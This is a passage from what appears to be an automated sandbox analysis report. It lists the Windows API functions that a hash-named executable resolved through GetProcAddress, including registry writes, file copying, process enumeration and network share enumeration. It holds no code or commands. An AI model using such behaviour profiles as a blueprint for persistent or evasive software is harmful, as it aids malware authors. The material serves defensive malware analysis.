\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter OleLoadPictureEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter DispCallFunc (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter LoadTypeLibEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter UnRegisterTypeLib (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateTypeLib2 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDateFromUdate (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarUdateFromDate (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetAltMonthNames (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarNumFromParseNum (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarParseNumFromStr (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecFromR4 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecFromR8 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecFromDate (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecFromI4 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecFromCy (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarR4FromDec (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetRecordInfoFromTypeInfo (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetRecordInfoFromGuids (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetRecordInfo (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArraySetRecordInfo (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetIID (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArraySetIID (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArrayCopyData (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArrayAllocDescriptorEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SafeArrayCreateEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarFormat (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarFormatDateTime (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarFormatNumber (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarFormatPercent (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarFormatCurrency (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarWeekdayName (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarMonthName (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarCat (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarEqv (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarImp (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarPow (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarAbs (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarFix (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarInt (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarRound (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecAdd (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarDecCmp (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarBstrCat (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarCyMulI4 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter VarBstrCmp (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDOrCLSIDToTypeLibrary (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SHGetSpecialFolderLocation (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SHGetPathFromIDListA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FindWindowExA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter WNetOpenEnumA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetCaps (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetUser (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPAddConnection (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPAddConnection3 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetReconnectFlags (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPCancelConnection (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetConnection (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetConnection3 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetUniversalName (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPOpenEnum (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPEnumResource (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPCloseEnum (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetResourceParent (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetResourceInformation (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPGetConnectionPerformance (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NPFormatNetworkName (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NetpIsRemote (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NetpIsRemoteNameValid (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32RedirectTypeLibrary (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter RegQueryValueW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapConfiguredClsidToReferenceClsid (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NetApiBufferAllocate (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter WNetEnumResourceA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter WNetCloseEnum (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00005328)\n 